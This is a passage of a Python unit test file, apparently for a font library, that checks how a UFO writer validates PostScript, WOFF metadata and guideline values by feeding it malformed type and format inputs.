    tooMany = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
    invalidPairs = [
        # names must be strings
        ("postscriptFontName", 123),
        ("postscriptFullName", 123),
        # slant angle must be a number
        ("postscriptSlantAngle", "abc"),
        # unique ID must be an int
        ("postscriptUniqueID", "abc"),
        # underline metrics must be numbers
        ("postscriptUnderlineThickness", "abc"),
        ("postscriptUnderlinePosition", "abc"),
        # fixed pitch flag must be a boolean
        ("postscriptIsFixedPitch", 2),
        # blue zone lists: not a list, uneven count, too many values
        ("postscriptBlueValues", "abc"),
        ("postscriptBlueValues", [500]),
        ("postscriptBlueValues", tooMany),
        ("postscriptOtherBlues", "abc"),
        ("postscriptOtherBlues", [500]),
        ("postscriptOtherBlues", tooMany),
        ("postscriptFamilyBlues", "abc"),
        ("postscriptFamilyBlues", [500]),
        ("postscriptFamilyBlues", tooMany),
        ("postscriptFamilyOtherBlues", "abc"),
        ("postscriptFamilyOtherBlues", [500]),
        ("postscriptFamilyOtherBlues", tooMany),
        # stem snap lists: not a list, too many values
        ("postscriptStemSnapH", "abc"),
        ("postscriptStemSnapH", tooMany),
        ("postscriptStemSnapV", "abc"),
        ("postscriptStemSnapV", tooMany),
        # blue tuning values must be numbers
        ("postscriptBlueFuzz", "abc"),
        ("postscriptBlueShift", "abc"),
        ("postscriptBlueScale", "abc"),
        # force bold flag must be a boolean
        ("postscriptForceBold", "abc"),
        # widths must be numbers
        ("postscriptDefaultWidthX", "abc"),
        ("postscriptNominalWidthX", "abc"),
        # names must be strings
        ("postscriptWeightName", 123),
        ("postscriptDefaultCharacter", 123),
        # windows character set must be a valid (positive) value
        ("postscriptWindowsCharacterSet", -1),
        # NOTE(review): the two FOND cases below duplicate testFONDWrite;
        # kept to preserve the original test's coverage exactly.
        ("macintoshFONDFamilyID", "abc"),
        ("macintoshFONDName", 123),
    ]
    for attr, badValue in invalidPairs:
        infoObject = self.makeInfoObject()
        setattr(infoObject, attr, badValue)
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()
def testWOFFWrite(self):
    """Validate the WOFF-specific fontinfo attributes through UFOWriter.writeInfo.

    Each stanza builds a fresh info object via self.makeInfoObject(),
    assigns one WOFF attribute (either a valid or an invalid value), and
    checks that writeInfo either succeeds or raises UFOLibError.

    NOTE(review): the expected-success stanzas previously wrote a fresh
    ``TestInfoObject()`` instead of the constructed ``infoObject``, which
    meant the attribute under test was never actually written; they now
    write ``infoObject``, matching the woffMetadataLicensee stanzas below.
    Two stanzas were also missing their ``writer = UFOWriter(...)`` line
    and silently reused a stale writer; those lines have been added.
    """
    # woffMajorVersion
    ## not an int
    infoObject = self.makeInfoObject()
    infoObject.woffMajorVersion = 1.0
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.woffMajorVersion = "abc"
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # woffMinorVersion
    ## not an int
    infoObject = self.makeInfoObject()
    infoObject.woffMinorVersion = 1.0
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.woffMinorVersion = "abc"
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # woffMetadataUniqueID
    ## none
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataUniqueID = None
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## not a dict
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataUniqueID = 1
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## unknown key
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataUniqueID = dict(id="foo", notTheRightKey=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## no id
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataUniqueID = dict()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## not a string for id
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataUniqueID = dict(id=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## empty string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataUniqueID = dict(id="")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    # woffMetadataVendor
    ## no name
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(url="foo")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## name not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name=1, url="foo")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## name an empty string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="", url="foo")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## no URL
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="foo")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="foo", url=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## url empty string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="foo", url="")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## have dir
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir="ltr")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir="rtl")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## dir not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir not ltr or rtl
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir="utd")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## have class
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = {"name" : "foo", "url" : "bar", "class" : "hello"}
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## class not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = {"name" : "foo", "url" : "bar", "class" : 1}
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## class empty string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataVendor = {"name" : "foo", "url" : "bar", "class" : ""}
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    # woffMetadataCredits
    ## no credits attribute
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = {}
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## unknown attribute
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(name="foo")], notTheRightKey=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## not a list
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits="abc")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## no elements in credits
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## credit not a dict
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=["abc"])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## unknown key
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", notTheRightKey=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## no name
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(url="foo")])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## name not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(name=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", url=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## role not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", role=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", dir=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir not ltr or rtl
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", dir="utd")])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## class not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataCredits = dict(credits=[{"name" : "foo", "class" : 1}])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # woffMetadataDescription
    ## no url
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(text="foo")])
    # this stanza previously reused a stale writer from the credits tests
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(text="foo")], url=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## no text
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(url="foo")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text not a list
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text="abc")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item not a dict
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=["abc"])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item unknown key
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(text="foo", notTheRightKey=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item missing text
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(language="foo")])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(text=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(text="foo", url=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## language not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(text="foo", language=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir not ltr or rtl
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[dict(text="foo", dir="utd")])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## class not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataDescription = dict(text=[{"text" : "foo", "class" : 1}])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # woffMetadataLicense
    ## no url
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicense = dict(text=[dict(text="foo")])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicense = dict(text=[dict(text="foo")], url=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## id not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicense = dict(text=[dict(text="foo")], id=1)
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## no text
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicense = dict(url="foo")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## text not a list
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicense = dict(text="abc")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item not a dict
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicense = dict(text=["abc"])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item unknown key
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicense = dict(text=[dict(text="foo", notTheRightKey=1)])
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item missing text
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicense = dict(text=[dict(language="foo")])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicense = dict(text=[dict(text=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicense = dict(text=[dict(text="foo", url=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## language not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicense = dict(text=[dict(text="foo", language=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir not ltr or rtl
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicense = dict(text=[dict(text="foo", dir="utd")])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## class not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicense = dict(text=[{"text" : "foo", "class" : 1}])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # woffMetadataCopyright
    ## unknown attribute
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[dict(text="foo")], notTheRightKey=1)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## no text
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict()
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text not a list
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text="abc")
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item not a dict
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=["abc"])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item unknown key
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", notTheRightKey=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item missing text
    infoObject = self.makeInfoObject()
    # this stanza previously had no writer of its own and reused a stale one
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[dict(language="foo")])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[dict(text=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", url=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## language not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", language=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir not ltr or rtl
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", dir="utd")])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## class not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataCopyright = dict(text=[{"text" : "foo", "class" : 1}])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # woffMetadataTrademark
    ## unknown attribute
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[dict(text="foo")], notTheRightKey=1)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## no text
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict()
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text not a list
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text="abc")
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item not a dict
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=["abc"])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item unknown key
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", notTheRightKey=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text item missing text
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[dict(language="foo")])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## text not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[dict(text=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## url not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", url=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## language not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", language=1)])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir not ltr or rtl
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", dir="utd")])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## class not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataTrademark = dict(text=[{"text" : "foo", "class" : 1}])
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # woffMetadataLicensee
    ## no name
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicensee = dict()
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## unknown attribute
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicensee = dict(name="foo", notTheRightKey=1)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## name not a string
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    infoObject.woffMetadataLicensee = dict(name=1)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## dir options
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicensee = dict(name="foo", dir="ltr")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicensee = dict(name="foo", dir="rtl")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## dir not ltr or rtl
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicensee = dict(name="foo", dir="utd")
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## have class
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicensee = {"name" : "foo", "class" : "hello"}
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    self.tearDownUFO()
    ## class not a string
    infoObject = self.makeInfoObject()
    infoObject.woffMetadataLicensee = {"name" : "foo", "class" : 1}
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
def testGuidelinesWrite(self):
    """Validate guideline entries passed through UFOWriter.writeInfo.

    Every stanza supplies one malformed guideline dict and expects the
    UFO 3 fontinfo validator to raise UFOLibError.
    """
    # x
    ## not an int or float
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x="1")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # y
    ## not an int or float
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(y="1")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # angle
    ## < 0
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, y=0, angle=-1)]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## > 360
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, y=0, angle=361)]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # name
    ## not a string
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, name=1)]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    # color
    ## not a string
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color=1)]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## not enough commas
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1 0, 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1 0 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1 0 0 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## not enough parts
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color=", 0, 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1, , 0, 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1, 0, , 0")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="1, 0, 0, ")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color=", , , ")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
    self.tearDownUFO()
    ## not a number in all positions
    infoObject = self.makeInfoObject()
    infoObject.guidelines = [dict(x=0, color="r, 1, 1, 1")]
    writer = UFOWriter(self.dstDir, formatVersion=3)
